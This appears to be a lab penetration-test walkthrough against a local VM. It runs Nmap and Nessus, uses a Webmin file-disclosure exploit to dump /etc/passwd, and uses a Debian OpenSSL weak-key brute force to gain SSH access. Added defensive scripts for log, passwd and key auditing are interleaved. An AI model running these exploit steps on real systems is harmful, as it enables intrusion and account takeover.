Posted by shinigami at 07:46
Before attacking, we need to work through the stages of the hacking framework.

- Information Gathering

In this section I will collect some information about the target using Nmap.
root@bt:~# nmap -sS -A -p10-10000 192.168.56.101

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-09-14 10:46 WIT
Nmap scan report for 192.168.56.101
Host is up (0.00083s latency).
Not shown: 9986 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
MAC Address: 08:00:27:42:D9:A7 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Host script results:
|_nbstat: NetBIOS name: UBUNTUVM, NetBIOS user: , NetBIOS MAC:
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
|   OS: Unix (Samba 3.0.26a)
|   Computer name: ubuntuvm
|   Domain name: nsdlab
|   FQDN: ubuntuvm.NSDLAB
|   NetBIOS computer name:
|_  System time: 2012-09-14 10:46:59 UTC-5

TRACEROUTE
HOP RTT     ADDRESS
1   0.83 ms 192.168.56.101

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.11 seconds

- Service Enumeration
From the scan in the first section, we proceed to service enumeration. The open ports and the service versions Nmap identified are:

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
- Vulnerability Assessment

I will use Nessus for this step. Open Nessus and scan the target.

The Nessus results show a lot of vulnerabilities. You can pick them one by one as needed.

From the results we can see that Webmin has an Arbitrary File Disclosure bug, so I will use it to gather username and password information.
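An arbitrary file disclosure of this kind leaves a trace in the web server's access log: a request path that, once percent-decoded, climbs out of the document root with `..` segments or names a system file such as /etc/passwd. The script below is an added example written from the defender's side; it is not code from the post or from Webmin. It assumes the log is in Common Log Format, and every log line, IP and path in it is constructed for the example (the `/images/` prefix is a placeholder, not a real Webmin path).

```python
"""Flag web requests that look like path traversal or sensitive-file reads.

Added example (not part of the original post). Reads access-log lines in
Common Log Format, percent-decodes each request path until it stops
changing (so double-encoded sequences are normalised too), and reports
requests that contain a '..' segment, a control character, or a reference
to a sensitive system file. All log lines below are constructed samples.
"""
import re
from urllib.parse import unquote

SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "/etc/group", "/root/", "/.ssh/")

# Common Log Format: host ident authuser [date] "METHOD path PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log: one normal request, one single-encoded traversal
# that was served (200), one double-encoded traversal that failed (404).
SAMPLE_LOG = [
    '192.168.56.1 - - [14/Sep/2012:10:52:01 +0700] "GET /index.cgi HTTP/1.1" 200 1532',
    '192.168.56.1 - - [14/Sep/2012:10:52:07 +0700] "GET /images/..%2F..%2F..%2Fetc/passwd HTTP/1.1" 200 2198',
    '192.168.56.1 - - [14/Sep/2012:10:52:09 +0700] "GET /images/%252e%252e/%252e%252e/etc/shadow HTTP/1.1" 404 311',
]


def fully_decode(path: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so %252e%252e becomes '..'."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify_path(raw_path: str) -> list[str]:
    """Return the reasons a request path looks suspicious (empty list if clean)."""
    reasons = []
    decoded = fully_decode(raw_path)
    path_only = decoded.split('?', 1)[0]          # ignore the query string
    # Compare each segment with non-printing bytes removed, so a '..'
    # padded with control characters is still recognised as '..'.
    segments = [re.sub(r'[\x00-\x1f\x7f]', '', s) for s in path_only.split('/')]
    if '..' in segments:
        reasons.append('dot-dot segment after decoding')
    if re.search(r'[\x00-\x1f\x7f]', decoded):
        reasons.append('control character in request')
    for name in SENSITIVE_FILES:
        if name in path_only:
            reasons.append(f'references {name}')
            break
    return reasons


def scan_log(lines) -> list[dict]:
    """Return one finding per suspicious request; a 200 status means it was served."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                                # not Common Log Format, skip
        reasons = classify_path(m['path'])
        if reasons:
            hits.append({'ip': m['ip'], 'path': m['path'],
                         'status': int(m['status']), 'reasons': reasons})
    return hits


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        served = 'SERVED' if hit['status'] == 200 else 'refused'
        print(f"{hit['ip']} {served} {hit['path']}: {', '.join(hit['reasons'])}")
```

The status code matters when triaging: a traversal request answered with 200 and a body size consistent with the named file is evidence of disclosure, while a 404 is only an attempt. Decoding in a bounded loop rather than once is what catches the double-encoded variant.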
- Exploitation
From the Nessus results I will use two bugs here: OpenSSL and Webmin.

Go to exploitdb and search for openssl and webmin exploits.

First, I want to try the Webmin bug and download /etc/passwd and /etc/shadow.
root@bt:~# cd /pentest/exploits/exploitdb/
root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
 Description                                                                Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
Webmin 0.91 Directory Traversal Vulnerability                               /cgi/remote/21183.txt
root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl 192.168.56.101 10000 /etc/passwd 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.56.101 on port 10000!
FILENAME: /etc/passwd
FILE CONTENT STARTED
-----------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
biasa:x:1004:1004:,,,:/home/biasa:/bin/bash
-------------------------------------
Now we know the usernames on the box.

Next I will get access with one of the available usernames. One bug from the Nessus scan is still unused: OpenSSL. Let's search exploit-db for it.
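The same passwd dump an attacker reads for usernames is what an administrator should be auditing regularly. The script below is an added example (not from the post) that parses the seven-field passwd format and reports the account configurations a defender wants to see: a uid-0 account other than root, an empty password field, duplicate uids, and accounts with an interactive shell. The passwd text it runs on is a constructed sample modelled on the layout of the file above; the `backup2` account and the duplicate uid are planted so that the checks have something to find.

```python
"""Audit an /etc/passwd dump for risky account configurations.

Added example (not part of the original post). Parses the classic
name:passwd:uid:gid:gecos:home:shell format and flags entries that
deserve review. The sample below is constructed; two entries (backup2
with uid 0 and no password, and a duplicated uid 1001) are planted.
"""
from collections import Counter
from dataclasses import dataclass

INTERACTIVE_SHELLS = {"/bin/bash", "/bin/sh", "/bin/zsh", "/bin/dash"}

# Constructed sample, not the file recovered in the post.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
backup2::0:0::/root:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1001:1002::/home/osama:/bin/bash
"""


@dataclass
class PasswdEntry:
    name: str
    passwd: str      # "x" means the hash lives in /etc/shadow; "" means no password
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> list[PasswdEntry]:
    """Parse passwd-format text; blank lines and '#' comments are skipped."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell))
    return entries


def audit_passwd(entries: list[PasswdEntry]) -> dict[str, list[str]]:
    """Group account names under the finding that applies to them."""
    findings: dict[str, list[str]] = {
        "uid0_not_root": [],     # any second superuser account
        "empty_password": [],    # login possible with no password at all
        "duplicate_uid": [],     # two names sharing one identity in the kernel's eyes
        "interactive_login": [], # accounts that can get a shell (review each)
    }
    for e in entries:
        if e.uid == 0 and e.name != "root":
            findings["uid0_not_root"].append(e.name)
        if e.passwd == "":
            findings["empty_password"].append(e.name)
        if e.shell in INTERACTIVE_SHELLS:
            findings["interactive_login"].append(e.name)
    counts = Counter(e.uid for e in entries)
    findings["duplicate_uid"] = sorted({e.name for e in entries if counts[e.uid] > 1})
    return findings


if __name__ == "__main__":
    for category, names in audit_passwd(parse_passwd(SAMPLE_PASSWD)).items():
        print(f"{category:18s} {', '.join(names) or '-'}")
```

On a host of this vintage the real dump above shows most system accounts with /bin/sh as their shell, which is exactly the kind of line the `interactive_login` list is meant to surface for review; a modern baseline gives service accounts /usr/sbin/nologin.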
root@bt# cd /pentest/exploits/exploitdb/
root@bt# ./searchsploit openssl
 Description                                                                Path
--------------------------------------------------------------------------- -------------------------
Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b)             /multiple/dos/146.c
Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)             /linux/remote/764.c
OpenSSL < 0.9.7l / 0.9.8d SSLv2 Client Crash Exploit                        /multiple/dos/4773.pl
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit                      /multiple/remote/5622.txt
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby)               /multiple/remote/5632.rb
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)             /linux/remote/5720.py
OpenSSL <= 0.9.8k                                                           /multiple/dos/8720.c
OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit                   /multiple/dos/8873.c
OpenSSL remote DoS                                                          /linux/dos/12334.c
OpenSSL ASN1 BIO Memory Corruption Vulnerability                            /multiple/dos/18756.txt
OpenSSL ASN1 BIO Memory Corruption Vulnerability                            /multiple/dos/18756.txt
PHP 6.0 openssl_verify() Local Buffer Overflow PoC                          /windows/dos/19963.txt

Before running the exploit, we need the set of SSH RSA keys generated by the Debian OpenSSL bug.

Download it here: http://digitaloffense.net/tools/debian-openssl/debian_ssh_rsa_2048_x86.tar.bz2

Extract the RSA keys; now it is time to run the exploit.
root@bt# ruby /pentest/exploits/exploitdb/platforms/multiple/remote/5632.rb 192.168.56.101 vmware /home/biasa/viz/rsa/2048
testing key 2/32768 /home/biasa/viz/rsa/2048/e04baf9d04ca7cd565d71880de75c58e-29931...
testing key 3/32768 /home/biasa/viz/rsa/2048/2411614d9fe125cbb7f5b8f13fa1c0a0-18050...
.......cut.......
testing key 21377/32768 /home/biasa/viz/rsa/2048/70f4f5c0201d70a8e765bdc4a492d1da-15597...
testing key 21378/32768 /home/biasa/viz/rsa/2048/f0d557e76c4e6380d81d49262dd7cb63-27526...
KEYFILE FOUND: /home/biasa/viz/rsa/2048/d8629ce6dc8f2492e1454c13f46adb26-4566

Gotcha, we got the RSA key. Try it with SSH, but make sure that the permission is 755.
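The reason a 32768-key search can succeed at all is that keys generated with the broken Debian OpenSSL PRNG come from a small, enumerable set, so the defensive fix on a server is to reject any authorized key whose fingerprint is in a blocklist of that set and, more generally, to refuse short keys. The script below is an added example of that check, written for this post rather than taken from it or from OpenSSH. It parses `ssh-rsa` entries from an authorized_keys file, decodes the SSH wire format to recover the modulus size, computes the MD5 and SHA-256 fingerprints the way OpenSSH does, and flags keys that are blocklisted or under 2048 bits. Every key in it is constructed from made-up numbers, and the blocklist is built from one of those constructed keys; it is not the real Debian weak-key list, which an operator would load from a file.

```python
"""Audit authorized_keys entries against a weak-key blocklist and a size floor.

Added example (not part of the original post). The RSA moduli below are
constructed integers of the right bit length, not real keys, and the
blocklist is derived from one of them purely to exercise the check.
"""
import base64
import hashlib
import struct

MIN_RSA_BITS = 2048


def _read_string(blob: bytes, off: int):
    """Read one length-prefixed SSH string; return (value, new offset)."""
    (length,) = struct.unpack(">I", blob[off:off + 4])
    off += 4
    return blob[off:off + length], off + length


def _write_string(data: bytes) -> bytes:
    return struct.pack(">I", len(data)) + data


def _mpint(n: int) -> bytes:
    """Encode a non-negative integer as an SSH mpint (leading 0x00 if high bit set)."""
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    if raw and raw[0] & 0x80:
        raw = b"\x00" + raw
    return _write_string(raw)


def encode_ssh_rsa(e: int, n: int) -> str:
    """Base64 body of an 'ssh-rsa' public key (used here to build test keys)."""
    blob = _write_string(b"ssh-rsa") + _mpint(e) + _mpint(n)
    return base64.b64encode(blob).decode()


def parse_ssh_rsa(b64: str) -> dict:
    """Decode an 'ssh-rsa' key body: modulus size plus MD5 and SHA256 fingerprints."""
    blob = base64.b64decode(b64)
    ktype, off = _read_string(blob, 0)
    if ktype != b"ssh-rsa":
        raise ValueError(f"unsupported key type {ktype!r}")
    _e_raw, off = _read_string(blob, off)
    n_raw, off = _read_string(blob, off)
    n = int.from_bytes(n_raw, "big")
    return {
        "bits": n.bit_length(),
        "md5": hashlib.md5(blob).hexdigest(),                       # classic fingerprint form
        "sha256": base64.b64encode(hashlib.sha256(blob).digest()).rstrip(b"=").decode(),
    }


# Constructed moduli: correct bit lengths, no cryptographic meaning.
WEAK_N = (1 << 2047) | 0x10001       # stands in for a blocklisted 2048-bit key
GOOD_N = (1 << 2047) | 0x2A2A2A2B    # a 2048-bit key not on the list
SHORT_N = (1 << 1023) | 0x12345      # a 1024-bit key, below the floor

# Constructed blocklist: in practice loaded from the published weak-key fingerprints.
BLOCKLIST_MD5 = {parse_ssh_rsa(encode_ssh_rsa(65537, WEAK_N))["md5"]}

# Constructed authorized_keys content; the second line carries an options field.
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "ssh-rsa " + encode_ssh_rsa(65537, GOOD_N) + " ops@bastion",
    'from="192.168.56.0/24" ssh-rsa ' + encode_ssh_rsa(65537, WEAK_N) + " vmware@ubuntuvm",
    "ssh-rsa " + encode_ssh_rsa(65537, SHORT_N) + " legacy@old-host",
])


def audit_authorized_keys(text: str, blocklist_md5: set[str],
                          min_bits: int = MIN_RSA_BITS) -> list[dict]:
    """Return one finding per ssh-rsa key that is blocklisted or too short."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        # Locate the key type so an options field (quoted values without
        # spaces) before it does not confuse the parse.
        try:
            idx = parts.index("ssh-rsa")
        except ValueError:
            continue                      # other key types are out of scope here
        info = parse_ssh_rsa(parts[idx + 1])
        reasons = []
        if info["md5"] in blocklist_md5:
            reasons.append("fingerprint on weak-key blocklist")
        if info["bits"] < min_bits:
            reasons.append(f"modulus only {info['bits']} bits")
        if reasons:
            findings.append({"line": lineno, "comment": " ".join(parts[idx + 2:]),
                             "reasons": reasons, **info})
    return findings


if __name__ == "__main__":
    for f in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, BLOCKLIST_MD5):
        print(f"line {f['line']} ({f['comment']}): {'; '.join(f['reasons'])}")
```

The same parse applies to the host keys Nmap reported earlier (a 1024-bit DSA key and a 2048-bit RSA key): checking their fingerprints against the blocklist tells you whether the server's own identity key came from the affected generator.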
- Privilege Escalation

Let's connect using SSH.

root@bt:/pentest/exploits/exploitdb# ssh -i /home/biasa/viz/rsa/2048/d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.56.101
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Thu Sep 13 10:31:22 2012 from 192.168.56.1
vmware@ubuntuvm:~$

OK, we have access.